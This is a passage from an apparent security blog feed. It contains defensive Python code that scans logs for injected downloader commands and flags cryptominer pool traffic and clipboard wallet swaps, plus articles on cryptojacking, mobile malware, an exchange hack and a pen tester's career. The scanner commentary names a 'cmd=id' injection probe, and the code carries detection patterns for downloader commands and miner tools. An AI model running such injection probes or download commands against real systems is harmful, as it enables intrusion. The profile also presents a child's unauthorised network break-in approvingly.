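        values.append(decode_repeatedly(raw))
    return path, values


def scan_log(text):
    """Return one finding per injected downloader found in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, values = split_target(m.group("target"))
        for value in values:
            for hit in DOWNLOADER_RE.finditer(value):
                findings.append({
                    "ip": m.group("ip"),
                    "path": path,
                    "status": int(m.group("status")),
                    "command": hit.group(0).strip(" ;|&`$(\n"),
                    "urls": URL_RE.findall(value),
                    "executes_download": bool(EXEC_RE.search(value)),
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

The decode loop matters: attackers double-encode payloads to slip past filters that decode once, so the scanner keeps decoding until the string stops changing. The bare `cmd=id` probe on the second line is deliberately not flagged; it is injection too, but this check is scoped to the download-and-execute step the article describes, and the fetched URL it extracts is what you would hand to the network team for blocking.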

2018: The Rise of Cryptomining in the Browser

Browser-based cryptojacking involves a threat actor compromising a web server or website and injecting a cryptomining script into an otherwise legitimate page. Alternatively, the script can be embedded in an online advertisement and served through a legitimate ad network, so that it runs every time the ad is rendered in a visitor's browser.

X-Force research saw an explosion of cryptojacking activity in 2018, with cryptojacking attacks far exceeding all other forms of coin theft attacks.

Some of this rise in browser-based cryptojacking comes from unintended sources, such as vendors who sell cryptojacking scripts as an alternative to running advertisements on websites. The initial purpose is legitimate, but the same scripts can be used by attackers who run them on compromised websites. One of the largest providers of mining scripts of that type was Coinhive, an organization that pioneered the sale of these scripts. Because Coinhive scripts were so often used in cryptojacking attacks, users and security professionals would frequently see the names "Coinhive" or "Coinhive.Miner" in detection alerts. In March 2019, Coinhive voluntarily ceased operations.

Figure 1: Cryptojacking attacks exceeded malware cryptomining attacks by a nearly 2-1 ratio in 2018 (source: IBM X-Force)

Cryptojacking Was Big in 2018, So Why Shift to Cryptomining Malware in 2019?

As our data shows, browser-based cryptojacking was big in 2018. But as we moved into 2019, our data started showing a decline in that type of attack and a return to malware-based cryptojacking. A number of factors could be contributing to this shift.

One possibility is that the recent drop in cryptocurrency prices has made mining in the browser less profitable. A browser script competes with every other process on the device and runs only while the page is open, so it cannot sustain the hash rate of a miner installed on the device itself. As a result, browser-based cryptojacking takes much longer to earn each coin, which may be incentivizing threat actors to refocus on malware infections to speed things up.

Additionally, sharply reduced cryptocurrency value could encourage actors to move to an entirely different revenue stream, causing cryptomining malware to have a higher proportion of activity even though nominal levels may have dropped.

Threat actors could also be temporarily shifting away from browser-based cryptojacking if they relied on Coinhive to provide them with scripts. With Coinhive gone, threat actors would have to go to other script providers. While there are many other providers of the same sort of scripts, the removal of Coinhive could affect the overall ability of the technically unskilled to create web-based cryptojacking attacks.

Don't rejoice just yet: browser-based cryptojacking may see a resurgence in the near future due to the recent and sharp drop in the Monero network hash rate. When the network hash rate falls, mining difficulty adjusts downward and each unit of computing power earns a larger share of the reward, which makes cryptojacking more profitable despite its lower harvesting power.

Which Should I Worry About More: Browser-Based Cryptojacking or Cryptomining Malware?

The short answer is both. X-Force data indicates that while browser-based cryptojacking was increasingly popular through most of 2018, cryptomining malware made a resurgence at the end of 2018 and into the first quarter of 2019.

Figure 2: IBM X-Force data showing the rise and fall of cryptojacking popularity (source: IBM X-Force)

Browser-based cryptojacking was very popular with threat actors earlier in 2018, likely due to the following factors:

  • Without having to use malware and maintain a botnet, browser-based attacks can be easier for cybercriminals to set up compared to other forms of cryptomining attacks.
  • Threat actors needed only to infect a single web server to deploy a cryptojacking script to all visitors of that site and any other sites hosted thereon.
  • Cryptojacking is tougher for organizations to mitigate than cryptomining malware, since the infection occurs outside the organization on an unaffiliated server and takes advantage of users browsing to a compromised resource. In most cases, when the company’s security team sees alerts for mining activity, there isn’t much it can do to clean up within the company’s own devices. While one could notify the web server’s owner of the compromise, they may not know what to do about it or fail to address the issue.
  • With browser-based cryptojacking, a threat actor can forego wide-cast infection campaigns and the need to infect myriad devices. Instead, they aim to compromise a few web servers and expect to reach untold numbers of site visitors.

Figure 3: Browser-based cryptojacking resides outside an organization's zone of control (source: IBM X-Force)

Some Tips for Defenders

Malicious cryptomining and browser-based cryptojacking attacks are plentiful, but they are not impossible to defend against. Here are some tips for defenders from our X-Force IRIS threat intelligence specialists:

  • Engage in a thorough risk assessment to determine the acceptable risk appetite for malicious cryptomining activity for the organization.
  • Restrict outbound calls to cryptomining pools to help detect and prevent cryptomining within the organization’s environments.
  • Where feasible, disable JavaScript in browsers to directly prevent cryptojacking scripts from executing.
  • Update host-based detection signatures to include the latest cryptomining malware and, if possible, alert on significantly anomalous processor activity that may be indicative of ongoing cryptomining malware infections.
  • Continue updating intrusion detection and prevention system (IDS/IPS) signatures to help block the latest cryptojacking scripts.
  • Work closely with network security operations to block traffic to and from known cryptojacking addresses that can be obtained from a threat intelligence provider or maintained internally.
  • Educate stakeholders on the difference between browser- and device-based cryptojacking to facilitate better informed conversations on the organization’s cybersecurity posture.
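Two of the tips above, restricting outbound calls to mining pools and blocking known cryptojacking addresses, depend on being able to recognize miner traffic in the first place. Pool miners speak Stratum, a line-oriented JSON-RPC protocol, and the Monero variant used by XMRig-style miners logs in with a wallet address and an agent string in clear text unless the pool wraps the connection in TLS. The following is an added example written for this article, not IBM X-Force code, that classifies captured client payloads on that basis. The flows are constructed; the IP addresses, ports and the wallet are placeholders.

```python
"""Added example (not IBM X-Force code): recognise miner-to-pool traffic in
captured client payloads so that outbound mining can be alerted on or blocked.
Pool miners speak Stratum (line-oriented JSON-RPC); the Monero variant used by
XMRig-style miners logs in with a wallet address and an agent string. The
flows below are constructed; addresses, ports and the wallet are placeholders.
Pools that wrap Stratum in TLS need the decrypted payload or a
destination-reputation check instead."""
import json
import re

STRATUM_METHODS = {
    "mining.subscribe", "mining.authorize", "mining.submit",  # classic Stratum
    "login", "submit", "getjob", "keepalived",                 # CryptoNote/Monero variant
}
# Standard and sub-addresses are 95 base58 characters starting with 4 or 8.
MONERO_ADDR_RE = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
MINER_AGENT_RE = re.compile(r"xmrig|xmr-stak|cpuminer|minerd|cgminer|bfgminer", re.I)
COMMON_POOL_PORTS = {3333, 3334, 4444, 5555, 7777, 8888, 14444}

# Constructed placeholder wallet: "4" followed by 94 valid base58 characters.
SAMPLE_WALLET = "4" + "A" * 94

SAMPLE_FLOWS = [
    {"src": "10.0.0.12", "dst": "203.0.113.10", "dport": 3333, "payloads": [
        json.dumps({"id": 1, "jsonrpc": "2.0", "method": "login", "params": {
            "login": SAMPLE_WALLET + ".rig01", "pass": "x",
            "agent": "XMRig/2.14.1", "algo": ["cn/r"]}}),
        json.dumps({"id": 2, "jsonrpc": "2.0", "method": "submit", "params": {
            "id": "1", "job_id": "a1", "nonce": "deadbeef", "result": "00" * 32}}),
    ]},
    {"src": "10.0.0.13", "dst": "203.0.113.20", "dport": 80, "payloads": [
        "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"]},
    {"src": "10.0.0.14", "dst": "10.0.5.5", "dport": 8080, "payloads": [
        json.dumps({"jsonrpc": "2.0", "method": "getUser", "params": [42], "id": 1})]},
    {"src": "10.0.0.15", "dst": "203.0.113.30", "dport": 3333, "payloads": [
        json.dumps({"id": 1, "method": "mining.subscribe", "params": ["cgminer/4.10"]}),
        json.dumps({"id": 2, "method": "mining.authorize", "params": ["worker.rig1", "x"]}),
    ]},
]


def parse_request(payload):
    """Return (method, params) if payload is one JSON-RPC request, else None."""
    try:
        msg = json.loads(payload)
    except ValueError:
        return None
    if not isinstance(msg, dict) or not isinstance(msg.get("method"), str):
        return None
    return msg["method"], msg.get("params")


def classify_flow(flow):
    """Return a finding dict if the client side of the flow looks like a miner."""
    finding = None
    for payload in flow["payloads"]:
        parsed = parse_request(payload)
        if parsed is None or parsed[0] not in STRATUM_METHODS:
            continue
        method, params = parsed
        if finding is None:
            finding = {"src": flow["src"], "dst": flow["dst"], "dport": flow["dport"],
                       "methods": [], "agent": None, "wallet": None,
                       "reasons": ["stratum-method"]}
        finding["methods"].append(method)
        if isinstance(params, dict):                      # Monero-style login
            agent = params.get("agent")
            if agent:
                finding["agent"] = agent
                if MINER_AGENT_RE.search(agent):
                    finding["reasons"].append("known-miner-agent")
            # Worker names are appended as <wallet>.rig or <wallet>+difficulty.
            wallet = re.split(r"[.+]", str(params.get("login", "")), maxsplit=1)[0]
            if MONERO_ADDR_RE.match(wallet):
                finding["wallet"] = wallet
                finding["reasons"].append("monero-address-in-login")
        elif isinstance(params, list) and params:         # classic Stratum
            if method == "mining.subscribe" and MINER_AGENT_RE.search(str(params[0])):
                finding["agent"] = str(params[0])
                finding["reasons"].append("known-miner-agent")
            if method == "mining.authorize":
                finding["wallet"] = str(params[0]).split(".")[0]
    if finding and flow["dport"] in COMMON_POOL_PORTS:
        finding["reasons"].append("common-pool-port")
    return finding


def scan_flows(flows):
    """Classify every flow and keep only those that produced a finding."""
    return [f for f in (classify_flow(flow) for flow in flows) if f]


if __name__ == "__main__":
    for f in scan_flows(SAMPLE_FLOWS):
        print(f["src"], "->", f["dst"], f["dport"], f["reasons"], f["wallet"])
```

The method name is the primary signal; the agent string, wallet and port only add confidence, because a legitimate internal JSON-RPC API (the third flow) shares the framing but not the vocabulary. The destination and wallet a finding carries are what you feed into the egress block list and, if the wallet appears in several hosts' traffic, into the incident scope.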



The post Cryptojacking Attacks: Who’s Mining on Your Coin? appeared first on Security Intelligence.

Author: Charles DeBeck

app security, Artificial Intelligence (AI), banking malware, Connected Devices, cryptocurrency, Data Protection, Google Play, Malware, Mobile Applications, Mobile Devices, Mobile Malware, Mobile Security, Mobile Threats, Password Management, Patch Management, Public Wi-Fi, Threat Detection, trojan,

Preparing for the Unpredictable: Security in a New World of Mobile Malware

Mobile malware is nothing new. But in recent months, attackers have been getting more creative and resourceful with how they conceal, distribute and deploy these threats.

This newfound creativity is part of a mobile threat trend that can be summarized as follows: Attacks are on the rise, they’re focusing on mobile devices and they’re getting far more aggressive with their methods.

Mobile Threats by the Numbers

The numbers are staggering. Kaspersky Lab's "Mobile Malware Evolution 2018" report found that the number of devices attacked by malware increased from 66.4 million in 2017 to 116.5 million in 2018, and we should assume another big rise for 2019. The researchers also found that the "quality" of malware, its precision and impact, is on the rise. The number of so-called "Trojan-droppers", malware whose job is to get past security and deliver its payload, doubled from 2017 to 2018, according to the report.

In its most recent "Mobile Threat Report," McAfee detailed how mobile phones are being increasingly targeted with mobile app backdoors, banking Trojans and cryptomining malware. One alarming trend is the number of fake apps appearing in dozens of app stores, rising from around 10,000 fake apps in the middle of 2018 to approximately 65,000 by the end of the year.

In addition, Verizon’s most recent “Mobile Security Index 2019” found that a majority of those surveyed believed their organization is at risk of mobile threats. One-third of companies reported suffering a compromise that involved mobile devices. Despite this, more than half said they had sacrificed security to “get the job done.” An incredible 81 percent of respondents said they had personally used insecure public WiFi for work, despite knowing that the practice is both unsafe and prohibited by company policy.

All this is to say that the threat from mobile devices is increasing at an extremely high rate, yet most organizations are woefully unready.

A New World of Mobile Malware

All that data around the rising threat of mobile-based attacks doesn’t fully address the quality of the latest malware. Just look at the creative thinking behind a recent incarnation of malware called Anubis.

Anubis’ Motion-Based Evasion Tactics

Distributed inside at least two apps available on the Google Play store, Anubis banking malware concealed itself using the target phones’ motion sensors. Researchers often use emulators to hunt for Trojans in apps — or they search on real phones, which are often mounted and motionless. The Anubis creators figured out that one difference between security researchers and real-life users is motion. By activating only after motion was detected, the malware could remain invisible to many researchers but still activate on phones in the wild.

Trend Micro reported in January that the motion-activated Anubis appeared in two seemingly legitimate apps: a battery extender app with a 4.5-star rating and a currency converter. Once activated, Anubis installed a keylogger for stealing credentials or took screenshots for the same purpose.

Preinstalled Mobile Malware

Downloading apps is one way to sneak malware onto phones. Preinstalling it is another. The technology firm Upstream discovered in January that the Alcatel smartphone models Pixi 4 and A3 Max contained malware out of the box. The malware was hidden in a preinstalled weather app called Weather Forecast-World Weather Accurate Radar. The app was also available separately on the Google Play store and was downloaded more than 10 million times. It has since been removed.

The malware collected various bits of data, such as location data, user email addresses and International Mobile Equipment Identity (IMEI) numbers and may have loaded adware. It also subscribed users to a for-pay phone number service.

Clipper Malware on Google Play

Another unwelcome trend is the appearance of older methods of compromise in legitimate app stores. For example, the first clipper malware ever discovered on the official Google Play store was found by the security company ESET in February: Android/Clipper.C. Previously, clipper malware was the exclusive province of desktop PCs or unauthorized app stores.

Clipper apps replace the clipboard contents of a device with other data. For example, when a user copies a wallet address to paste into a cryptocurrency transaction, a clipper silently swaps it for the attacker's address, so the funds are sent to the attacker instead.

In addition, Android/Clipper.C attempted to steal credentials and private keys and send them to the attacker's Telegram account in order to steal Ethereum funds, and it could also replace either an Ethereum or a bitcoin wallet address on the clipboard.
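The defense against a clipper is to check, at paste time, that the address about to be used is still the one that was copied, and to treat a swap for another valid address of the same currency as the attack signature. The following is an added example written for this article, not ESET's code or analysis, showing that check with Base58Check validation for legacy Bitcoin addresses and format validation for Ethereum addresses. The two Bitcoin addresses are public, well-known values (the genesis coinbase address and the all-zero-hash address); the Ethereum address is a constructed placeholder.

```python
"""Added example (not ESET's code or analysis): a paste-time integrity check
for wallet addresses, the substitution a clipper performs. It validates
Bitcoin legacy addresses with Base58Check and Ethereum addresses by format,
then reports whether a pasted address still matches what was copied. The
two Bitcoin addresses are public, well-known values; the Ethereum address
is a constructed placeholder."""
import hashlib
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
ETH_RE = re.compile(r"^0x[0-9a-fA-F]{40}$")

GENESIS_ADDR = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"   # public: block 0 coinbase
BURN_ADDR = "1111111111111111111114oLvT2"             # public: all-zero hash160
ETH_PLACEHOLDER = "0x" + "ab" * 20                    # constructed placeholder


def b58decode(text):
    """Decode base58 to bytes; each leading '1' stands for one zero byte."""
    n = 0
    for ch in text:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError("invalid base58 character %r" % ch)
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    pad = len(text) - len(text.lstrip("1"))
    return b"\x00" * pad + body


def is_valid_btc_legacy(addr):
    """Base58Check: version byte + 20-byte hash + first 4 bytes of SHA256d."""
    try:
        raw = b58decode(addr)
    except ValueError:
        return False
    if len(raw) != 25 or raw[0] not in (0x00, 0x05):  # mainnet P2PKH / P2SH
        return False
    payload, checksum = raw[:21], raw[21:]
    digest = hashlib.sha256(hashlib.sha256(payload).digest()).digest()
    return digest[:4] == checksum


def classify(addr):
    """Label an address as eth, btc (legacy, checksum-valid) or unknown."""
    if ETH_RE.match(addr):
        return "eth"
    if is_valid_btc_legacy(addr):
        return "btc"
    return "unknown"


def check_paste(copied, pasted):
    """Return (ok, reason); ok is False whenever the pasted address differs.

    A pasted address that differs from the copied one but is itself a valid
    address of the same currency is exactly what a clipper produces.
    """
    if copied == pasted:
        return True, "unchanged"
    kind_copied, kind_pasted = classify(copied), classify(pasted)
    if kind_copied != "unknown" and kind_copied == kind_pasted:
        return False, "replaced with another valid %s address (clipper pattern)" % kind_copied
    return False, "clipboard content changed"


if __name__ == "__main__":
    print(check_paste(GENESIS_ADDR, GENESIS_ADDR))
    print(check_paste(GENESIS_ADDR, BURN_ADDR))
```

The checksum step is what makes the "same currency" judgement meaningful: a random edit to an address fails Base58Check, whereas the attacker's substitute must pass it or the transaction would be rejected, so a different but valid address is the strongest indicator. Bech32 (bc1...) addresses use a different checksum and are reported as unknown here; a production check would add that decoder.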

Attack Campaigns on a Massive Scale

Yet another new trend is distribution on a massive scale. Some 150 million Android users were recently affected by malware called SimBad, which, according to Check Point, disguised itself as an advertising component inside a large number of mobile games.

SimBad also carries out phishing attacks that lead users to websites where even more malware is downloaded, and once launched it is difficult to stop or uninstall. Apps containing the SimBad malware have since been removed from the store.

Distributing Malware via Image Files

Malware can even be smuggled onto a phone without an app. A recent Android bug allowed a standard image format to serve as the vehicle for an attack: a purpose-built PNG file could execute code when the phone processed it. Google fixed the flaw in its February patch and described it in a security bulletin. It is worth noting that the vast majority of Android phones are not updated frequently and did not get the patch quickly.

What Can We Do to Combat Creative New Malware Strains?

The bottom line is that mobile malware techniques to compromise security cannot be easily predicted. What can be predicted is that threats will continue to rise, new methods will continue to be devised and mobile devices will continue to be the focus of intense malware activity.

The point of all this is not to guard specifically against the examples in this article, but to understand the growing threat — and reflect on the fact that far too many organizations are unprepared. So what can they do to prepare for the unpredictable?

To get started, here are some mobile security best practices and policies to follow and enforce:

  • Keep devices current with the latest updates.

  • Stick to official and authorized app stores. While many of the threats reported here actually appeared on the official Google Play store, it's important to note that affected apps are removed once discovered. The same can't be said for unauthorized sources of mobile apps.

  • Minimize the number of apps installed and favor reputable app developers.

  • Embrace a comprehensive approach to mobile security that can protect against even unreported or unpredicted threats.

  • Understand that some of the newest threats evade signature-based tools and are caught only by behavior-based detection, including artificial intelligence-based tools.

  • Improve and enforce policies against using public WiFi and in favor of using good password management.

Nobody can predict how creative new malware methods will infiltrate the mobile devices used by employees at your organization. But it’s easy to predict that these attempts will be made. Security decision-makers can no longer think about these threats as theoretical or secondary in importance to other work. It’s time to act on what we know is coming: something unpredictable.

The post Preparing for the Unpredictable: Security in a New World of Mobile Malware appeared first on Security Intelligence.

Author: Mike Elgan

Bithump hacked, Computer Security, Crypto Attack, cryptocurrency, Cryptocurrency hack, Cyber Attack, Maintaining Access, Uncategorized,

Bithumb Hacked – Hackers Transferred $20 Million Worth Cryptocurrencies From Bithumb Wallet


Bithumb has been hacked for the third time. One of the world's largest cryptocurrency exchanges, Bithumb, was breached by unknown cybercriminals who stole nearly $20 million worth of cryptocurrencies from its wallet. Bithumb is a South Korean cryptocurrency exchange that has reportedly faced continuous cyber attacks since 2017, and this is the third incident in the past two years. Bithumb detected an unauthorized […]

The post Bithumb Hacked – Hackers Transferred $20 Million Worth Cryptocurrencies From Bithumb Wallet appeared first on GBHackers On Security.

bitcoin, Blockchain, cryptocurrency, Penetration Testing, Professional Development, Security Professionals, Security Services, X-Force,

How Chris Thomas Paired His Passion for Blockchain With Pen Testing

Chris Thomas, X-Force Red’s blockchain security expert, has always had an interest in understanding how technologies are built and operated. As a young child, Chris’ father thought it would be enjoyable for the two to build a computer instead of buying a premanufactured one. After two attempts, the father-and-son duo successfully built Chris’ first computer. Little did they know the project would ignite Chris’ future career as a penetration tester.

At just 11 years old, Chris performed his first penetration test, hacking into his school's network. The content of his school's information technology class wasn't challenging for Chris, giving him plenty of time to teach himself how to program. Using his self-taught knowledge, he was able to scan the school's network and access Windows shares that allowed him to log in as a domain administrator. Because he has a strong moral compass, Chris communicated his findings to the school's system administrator, who became a close ally and supported Chris' work. Through this experience, Chris knew he wanted to become a penetration tester.

Starting a Career in Penetration Testing

After secondary school, Chris pursued and completed an undergraduate degree in programming and a graduate degree in cybersecurity. He then began his first full-time job working as a system administrator for a large technology company in Manchester, England. Chris’ knowledge was second to none, but his employer would not let him begin his career as a penetration tester with the company. It was not until Chris alpha tested and passed the CREST CRT exam that his company moved him to a junior penetration tester position.

Over the next 10 years, Chris excelled in his role as a penetration tester and became a principal consultant, serving as the technical lead on a project for a large financial institution. He and his team managed the company’s global penetration testing network and built the network access controls from scratch. In the midst of that project, Chris met Thomas MacKenzie, who is now X-Force Red’s associate partner in Europe, the Middle East and Africa.

Joining the X-Force Red Team

Chris has been fascinated by blockchain technology since its inception and its initial ties to cryptocurrency. With a passion for understanding how systems work, he immediately educated himself on all things blockchain and bitcoin and has continued researching and tinkering with the technologies ever since.

When Thomas joined X-Force Red, he contacted Chris about his interest in joining the team as well. Thomas knew Chris had a strong interest in blockchain and reminded him that IBM was one of the industry leaders in developing new blockchain technology. Thomas suggested that Chris become X-Force Red’s leading blockchain testing expert, an opportunity Chris accepted without hesitation.

In his current role, leading X-Force Red’s blockchain testing services, Chris combines his passion for penetration testing with his love for blockchain. The team works with clients to find weaknesses not only in the implementation and use of blockchain technology itself, but also in the connected infrastructure.

Alongside X-Force Red’s veteran hackers, who are also developers and engineers, Chris is excited to help shape the adoption and implementation of blockchain across various industries.


The post How Chris Thomas Paired His Passion for Blockchain With Pen Testing appeared first on Security Intelligence.

Author: Carter Garrison